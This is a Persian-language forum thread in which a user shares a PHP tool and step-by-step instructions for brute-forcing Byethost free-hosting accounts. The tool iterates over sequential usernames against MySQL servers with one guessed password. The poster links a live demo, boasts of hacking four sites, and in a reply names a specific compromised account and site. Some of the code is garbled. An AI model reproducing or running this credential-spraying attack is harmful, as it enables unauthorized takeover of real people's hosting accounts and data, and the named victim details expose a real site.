هک بدون پسورد

[Agary]

تا حالا شده که فقط بخواین یک سایت رو هک کنید ؟
در مورد افراد حرفه ای مسلما پاسخ منفیه اما یکی که آماتوره فقط می خواد که یه سایت رو هک کنه براش اصلا مهم نیست که چیه !
من با استفاده از php یه برنامه نوشتم که دقیقا کارش همینه !
شما یه پسورد رو بهش می دین بعد اون آی دی ها رو اسکن می کنه تا یکیشون این پسورد رو داشته باشه بعد براتون پیام می ده!
من فعلا اینو به صورت demo تو سایت :
Agary.byethost 17.com/AA.php
گذاشتم . البته فعلا چون حوصله نداشتم فقط هاست های free بایت هاست (byethost.com) رو هک می کنه ولی خوب چند تا اشکال اساسی داره:
1. سرعتش کمه (البته می تونه برا هاست هم باشه)
2. بعد از یه مدتی کار به صورت ناقص تموم می شه (یه راه حل براش پیدا کردم مثلا این سایت یه سری از یوزر ها رو اسکن کرده حالا که از کار افتاده آخرین عددش به این صورته : b16_1223476 شما باید 1223476 رو کپی کنید و دکمه ی بک رو بزنید بعد به جای فیلد from این عدد رو وارد کنید بعد باقی فیلد ها رو مثل قبل پر کنید )
3. شانس در اینجا مهم ترین نقش رو داره
4. باید رنج یوزر ها رو داشته باشید و روش نگارششون رو
5. باید آدرس MySQL سایت رو داشته باشید.
و ... (نکته : با تمام این اشکالاتش روی بایت هاست جواب می ده)

روش کار : (در مثال های زیر همه دررابطه با بایت هاست گفته شده)
1. فیلد from رو پر کنید : من عدد 1000000 رو انتخاب کردم.
2. فیلد upto رو پر کنید : من عدد 1999999 رو انتخاب کردم.
3. فیلد start with رو پر کنید : من در اینجا چون مربوط به بایت هاسته عدد 16 رو انتخاب کردم (در زیر بیشتر توضیح می دم).
4. فیلد server name رو پر کنید : در اینجا منظور آدرس mysql هست که sql100.byehost 16.com می شه.
5. فیلد pass word رو پر کنید : من عدد 12345678 رو انتخاب کردم.
6. حالا دکمه ی مربوطه رو فشار بدید .
7. صبر کنید :
A: اگر عملیات بعد یه مدت متوقف شد : مثلا این سایت یه سری از یوزر ها رو اسکن کرده حالا که از کار افتاده آخرین عددش به این صورته : b16_1223476 شما باید 1223476 رو کپی کنید و دکمه ی بک رو بزنید بعد به جای فیلد from این عدد رو وارد کنید بعد باقی فیلد ها رو مثل قبل پر کنید . (که در بالا هم توضیح دادم)
B: اگر عملیات یک سایت رو با این ویژگی ها پیدا کنه پیام : you did it ! و در پایینش it has been finished ! ظاهر می شه که باید به آدرس panel.byethost .com رجوع کنید و
password : 12345678
username : b16_xxxxxxx
خواهد بود .
C: اگر عملیات هیچ سایتی با این ویژگی ها پیدا نکنه وقتی که به غددی که داخل فیلد upto وارد کردین می رسه پیغام : it has been finished ! ظاهر می شه و در پایینش یک دکمه که شما رو به AA.php دوباره رجوع می ده و عملیات از اول ....

درباره ی بایت هاست :
اگر داشته باشیم xxxxxx.byethos t13.com آدرس MySQL هست sql110.byethos t13.com => فیلد start with : 13
اگر داشته باشیم xxxxxx.byethos t16.com آدرس MySQL هست sql100.byethos t16.com => فیلد start with : 16
اگر داشته باشیم xxxxxx.byethos t17.com آدرس MySQL هست sql100.byethos t17.com => فیلد start with : 17

در نهایت بایت هاست خیلی بیش تر از اینها سیستم داره ولی من فقط همینا رو بلدم اگر دنبال باقی کار ها هستید باید پورت مربوط به MySQL رو پیدا کنید و آدرس MySQL به صورت این نوشته می شه byethostXX.com:PORT num
(نکته این روش میتونه در تمام سایت هایی که یوزر و پسوردشون که مربوط به اس کیو ال هست با یوزر و پسور تمام بخش های مربوط به سایت یکیه استفاده بشه مانند بایت هاست و مشتقات مربوط به اون)

در نهایت هم اضافه می کنم که من با این روش تونستم در مدت یک شبانه روز چهار تا سایت رو که از پسورد 12345678 استفاده می کردن هک کنم . پس باید درست حدس زد !

خوب اینم آخر کار امیدوارم که دوستان جسارت من رو ببخشن اگر اشتباهی در برنامه یا متن نوشته دارم از مدیران محترم خواهش می کنم که اون رو اصلاح کنن .
با تشکر.
پ .ن : در زیر کد های برنامه قرار داره :
<?php
function Amin ($u ,$v , $w , $y , $z)
{
for ($v ; $v <= $w ; $v++)
{
$x = "b" . $u . "_" . $v ;
$con = mysql_connect($y , $x , $z) ;
if ($con)
{
echo " you did it !";
echo $x;
break ;
}
else if (! $con)
{
echo $x;
}
}
echo "</br>" . "It has been finished !" ;

}
?>
فایل A

<html>
<body><form action="AAA.php" method="post">
From: <input type="text" name="from" />
Up to: <input type="text" name="upto" />
</br>
</br>
Start With : <input type="text" name="startwith" />
Server Name : <input type="text" name="servername" />
Pass Word : <input type="text" name="password" />
</br>
<input type="submit" />
</form></body>
</html>
فایل AA

<html>
<body>
<?php
include ("A.php") ;
Amin ($_POST["startwith"] ,$_POST["from"] , $_POST["upto"] , $_POST["servername"] , $_POST["password"] ) ;
?>
<form action="AA.php" method="post">
<form action="AAAA.php" method="post">
<input type="submit" />
</form>
</body>
</html>
فایل AAA

<?php
include (A.php) ;
codemysql_clos e($con);
?>
فایل AAAA

پایان

[zer0tent]

با سلام
يک توضيحي اگه مي شه براي افراد تازه کاري مثل من بده مثلا تو قسمت هاي زير چه بايد نوشت
From:
Up to
Start With
Server Name
Pass Word
با تشکر فراوان

[Agary]

سلام دوست عزیز :
من یه مثال برای شما می زنم که امیدوارم مفید واقع بشه :
From : 1000000
Up to : 1999999
Start With : 13
Server Name : sql110.byethost13.com
Pass Word : 12345678
همون طور که خواهید دید بعد از یه مدتی عملیات متوقف می شه حالا باید آخرین کدی که در صفحه به نمایش در اومده که به صورت b13_xxxxxxx هست رو از xxxxxxx اش کپی بگیرید و دکمه ی back رو بزنید بعد در فیلد From عدد xxxxxxx رو وارد کنید باقی فیلد ها رو هم مثل قبل پر کنید بعد ادامه ی کار و به همین ترتیب این چرخه ادامه پیدا می کنه تا یه سایت با این ویژگی ها پیدا بشه که همون طور که گفتم پیام بالا ظاهر می شه من تونستم سایت : b13_1547211 رو با پسورد 12345678 گیر بیارم احتمالا شما هم باید به این سایت بر بخورید که آدرس سایت هم http://nightlife.byethost13.com هست .
دوست عزیز البته شما رو به خدا سایتش رو پاک نکنینا .... !!!!
اینم یه مثال ساده فقط باید صبر داشته باشید !
با تشکر از همه ی دوستانی که من رو مورد عنایت و لطف خودشون قرار دادن .